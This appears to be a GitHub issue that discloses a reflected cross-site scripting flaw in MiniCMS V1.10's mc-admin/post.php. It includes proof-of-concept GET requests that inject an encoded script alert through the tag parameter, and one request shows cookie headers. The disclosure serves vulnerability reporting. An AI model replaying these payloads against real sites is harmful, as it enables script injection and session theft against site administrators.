search

bg5sbk / MiniCMS

至简的个人网站内容管理系统
http://1234n.com/?projects/minicms/
227 stars 61 forks source link

MiniCMS V1.10 has Another XSS in the mc-admin/post.php #23

Closed PrincyEdward closed 3 years ago

PrincyEdward commented 6 years ago

MiniCMS V1.10 has XSS in the mc-admin/post.php while state=delete, draft, publish via tag parameter.

Affected Version : MiniCMS V1.10 Affected URL: http://{host}/MiniCMS-1.10/mc-admin/post.php?state=&tag=&date=

  1. GET /host/MiniCMS-1.10/mc-admin/post.php?state=publish&tag=prince%3Cscript%3Ealert%2812%29%3B%3C%2Fscript%3E&date=2018-08 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: mc_token=c30807e6587ade285ba7ade9f881b3d7; admin_auth=eyJpdiI6ImtNXC8xRHViQ1Z1Zks0cUJXclwva0hxZz09IiwidmFsdWUiOiJQclBudG5vTmh0YWVuKzdwNUpHTm1VSHJDdVNjVys4cmNybVV3cVFNb0tYdVY0QXdXVU0rVUhCT0wxTjN1V3lVWnNhZCt2UG8rZ0ZoRzVPQU1MSTNwNzFKUXFhaittS1Z6cThZemlja1lTdFIrdzJiRzFZdHd3eUJIaElTdG5xXC8iLCJtYWMiOiIxMTkxMDg5MWY4Y2Q5ODI5YTE0M2JmYTAxNjZmMzdiZDFlMWYxNTlmY2YyZmVlNGY5OWEyZjhmMjZlYjI4MWQzIn0%3D Connection: close Upgrade-Insecure-Requests: 1

  2. GET /host/MiniCMS-1.10/mc-admin/post.php?state=delete&tag=prince%3Cscript%3Ealert%2812%29%3B%3C%2Fscript%3E&date=2018-08

  3. GET /host/MiniCMS-1.10/mc-admin/post.php?state=publish&tag=prince%3Cscript%3Ealert%2812%29%3B%3C%2Fscript%3E&date=2018-08